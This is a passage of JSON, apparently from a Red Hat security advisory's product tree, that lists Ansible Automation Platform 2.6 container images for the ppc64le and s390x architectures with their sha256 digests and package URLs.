"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139334"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Ad204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774644659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3Aa89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3A46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774647780"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774487884"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774490244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774311517"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774321273"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3Aa2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484549"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774485790"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774573035"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774268173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Ae43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139204"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774153089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774585183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774417022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3A293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774363040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3Ab3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774268174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774368903"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484033"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Ad0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774258433"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Afe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484073"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3A64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774243862"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Ac1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139334"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3A5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774644659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Afad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774647780"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3A78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774487884"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3Afa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774490244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774311517"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3A094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774321273"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3A85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7?arch=s390x\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484549"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
